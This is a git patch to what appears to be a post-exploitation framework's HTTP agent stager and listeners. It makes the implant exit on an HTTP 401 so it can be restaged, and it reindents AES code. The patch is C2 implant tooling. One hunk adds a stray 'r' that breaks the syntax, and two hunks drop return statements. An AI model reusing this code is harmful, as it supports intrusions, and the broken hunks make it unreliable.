From 4106db3279e546722d546e65098023644195eee5 Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 02:45:41 -0400 Subject: [PATCH] Fixed renegotation loop in stager --- data/agent/stagers/http.py | 22 ++++++++++++---------- lib/listeners/http.py | 4 ++++ lib/listeners/http_foreign.py | 4 +++- lib/listeners/http_hop.py | 4 +++- 4 files changed, 22 insertions(+), 12 deletions(-) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 0a06c5a..99b6de6 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -18,6 +18,8 @@ import socket import subprocess from binascii import hexlify + + LANGUAGE = { 'NONE' : 0, 'POWERSHELL' : 1, @@ -335,10 +337,10 @@ class AES(object): tt = tk[KC - 1] tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^ - (self.S[(tt >> 8) & 0xFF] << 16) ^ - (self.S[ tt & 0xFF] << 8) ^ - self.S[(tt >> 24) & 0xFF] ^ - (self.rcon[rconpointer] << 24)) + (self.S[(tt >> 8) & 0xFF] << 16) ^ + (self.S[ tt & 0xFF] << 8) ^ + self.S[(tt >> 24) & 0xFF] ^ + (self.rcon[rconpointer] << 24)) rconpointer += 1 if KC != 8: @@ -352,9 +354,9 @@ class AES(object): tt = tk[KC // 2 - 1] tk[KC // 2] ^= (self.S[ tt & 0xFF] ^ - (self.S[(tt >> 8) & 0xFF] << 8) ^ - (self.S[(tt >> 16) & 0xFF] << 16) ^ - (self.S[(tt >> 24) & 0xFF] << 24)) + (self.S[(tt >> 8) & 0xFF] << 8) ^ + (self.S[(tt >> 16) & 0xFF] << 16) ^ + (self.S[(tt >> 24) & 0xFF] << 24)) for i in xrange(KC // 2 + 1, KC): tk[i] ^= tk[i - 1] @@ -372,9 +374,9 @@ class AES(object): for j in xrange(0, 4): tt = self._Kd[r][j] self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^ - self.U2[(tt >> 16) & 0xFF] ^ - self.U3[(tt >> 8) & 0xFF] ^ - self.U4[ tt & 0xFF]) + self.U2[(tt >> 16) & 0xFF] ^ + self.U3[(tt >> 8) & 0xFF] ^ + self.U4[ tt & 0xFF]) def encrypt(self, plaintext): 'Encrypt a block of plain text using the AES block cipher.' diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 9b9767d..01149a2 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py @@ -762,6 +762,10 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) + return (HTTPError.code, '') except urllib2.URLError as URLerror: diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py index a7ce61f..2aceb53 100644 --- a/lib/listeners/http_foreign.py +++ b/lib/listeners/http_foreign.py @@ -502,7 +502,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + r#if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py index f6d5044..16106f7 100644 --- a/lib/listeners/http_hop.py +++ b/lib/listeners/http_hop.py @@ -470,7 +470,9 @@ def send_message(packets=None): except urllib2.HTTPError as HTTPError: # if the server is reached, but returns an erro (like 404) missedCheckins = missedCheckins + 1 - return (HTTPError.code, '') + #if signaled for restaging, exit. + if HTTPError.code == 401: + sys.exit(0) except urllib2.URLError as URLerror: # if the server cannot be reached